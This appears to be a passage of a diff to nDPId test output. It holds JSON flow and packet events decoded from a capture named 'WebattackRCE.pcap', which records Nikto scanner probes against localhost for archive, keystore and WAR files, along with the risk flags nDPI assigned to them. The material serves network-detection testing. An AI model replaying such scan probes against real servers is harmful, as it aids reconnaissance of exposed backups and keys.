{"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":306,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277165,"flow_last_seen":1576420277165,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277165,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50156,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":306,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":1,"flow_last_seen":1576420277165,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277165,"pkt":"AAAAAAAAAAAAAAAACABFAADFxNJAAEAGd15\/AAABfwAAAcPsH5ANevxccArVDoAYAED+uQAAAQEICp1m\/NWdZvzVR0VUIC8xMjcwMC50YXIuYnoyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":306,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277165,"flow_last_seen":1576420277165,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277165,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50156,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":306,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277165,"flow_last_seen":1576420277165,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277165,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50156,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":307,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277166,"flow_last_seen":1576420277166,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277166,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50158,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":307,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":307,"flow_packet_id":1,"flow_last_seen":1576420277166,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277166,"pkt":"AAAAAAAAAAAAAAAACABFAADFbqBAAEAGzZB\/AAABfwAAAcPuH5Bs\/lYWJw4fzoAYAED+uQAAAQEICp1m\/NadZvzWR0VUIC8xMjcuMC4wLjEuamtzIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":307,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277166,"flow_last_seen":1576420277166,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277166,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50158,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":307,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":307,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277166,"flow_last_seen":1576420277166,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277166,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50158,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277168,"flow_last_seen":1576420277168,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277168,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50160,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":308,"flow_packet_id":1,"flow_last_seen":1576420277168,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277168,"pkt":"AAAAAAAAAAAAAAAACABFAADFNC9AAEAGCAJ\/AAABfwAAAcPwH5DG1AyisQj3YYAYAED+uQAAAQEICp1m\/NidZvzYR0VUIC8xMjcuMC4wLjEuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":308,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277168,"flow_last_seen":1576420277168,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277168,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50160,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":308,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":308,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277168,"flow_last_seen":1576420277168,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277168,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50160,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.1.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":309,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277170,"flow_last_seen":1576420277170,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277170,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50162,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":309,"flow_packet_id":1,"flow_last_seen":1576420277170,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277170,"pkt":"AAAAAAAAAAAAAAAACABFAADDKQdAAEAGEyx\/AAABfwAAAcPyH5DtUBGKsAbmZ4AYAED+twAAAQEICp1m\/NqdZvzZR0VUIC8xMjcuMC4wLndhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277170,"flow_last_seen":1576420277170,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277170,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50162,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277170,"flow_last_seen":1576420277170,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277170,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50162,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":310,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277171,"flow_last_seen":1576420277171,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277171,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50164,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":310,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":310,"flow_packet_id":1,"flow_last_seen":1576420277171,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420277171,"pkt":"AAAAAAAAAAAAAAAACABFAADDFtRAAEAGJV9\/AAABfwAAAcP0H5DIKS5flUY6Y4AYAED+twAAAQEICp1m\/NudZvzbR0VUIC8xMjcuMC4wLndhciBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":310,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277171,"flow_last_seen":1576420277171,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277171,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50164,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":310,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277171,"flow_last_seen":1576420277171,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420277171,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50164,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277172,"flow_last_seen":1576420277172,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277172,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50166,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":311,"flow_packet_id":1,"flow_last_seen":1576420277172,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277172,"pkt":"AAAAAAAAAAAAAAAACABFAADBjc9AAEAGrmV\/AAABfwAAAcP2H5CR+bVBDfA+SoAYAED+tQAAAQEICp1m\/NydZvzcR0VUIC8xMjcuMC50Z3ogSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":311,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277172,"flow_last_seen":1576420277172,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277172,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50166,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":311,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277172,"flow_last_seen":1576420277172,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277172,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50166,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":312,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277173,"flow_last_seen":1576420277173,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277173,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50168,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":312,"flow_packet_id":1,"flow_last_seen":1576420277173,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277173,"pkt":"AAAAAAAAAAAAAAAACABFAADBJThAAEAGFv1\/AAABfwAAAcP4H5BkXx28+RQoaIAYAED+tQAAAQEICp1m\/N2dZvzdR0VUIC8xMjcuMC50Z3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":312,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277173,"flow_last_seen":1576420277173,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277173,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50168,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":312,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277173,"flow_last_seen":1576420277173,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277173,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50168,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":313,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277175,"flow_last_seen":1576420277175,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277175,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50170,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":313,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":313,"flow_packet_id":1,"flow_last_seen":1576420277175,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277175,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/vR9AAEAGfxd\/AAABfwAAAcP6H5AAgoWRJHk9poAYAED+swAAAQEICp1m\/N+dZvzfR0VUIC8xMjcuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":313,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277175,"flow_last_seen":1576420277175,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277175,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50170,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
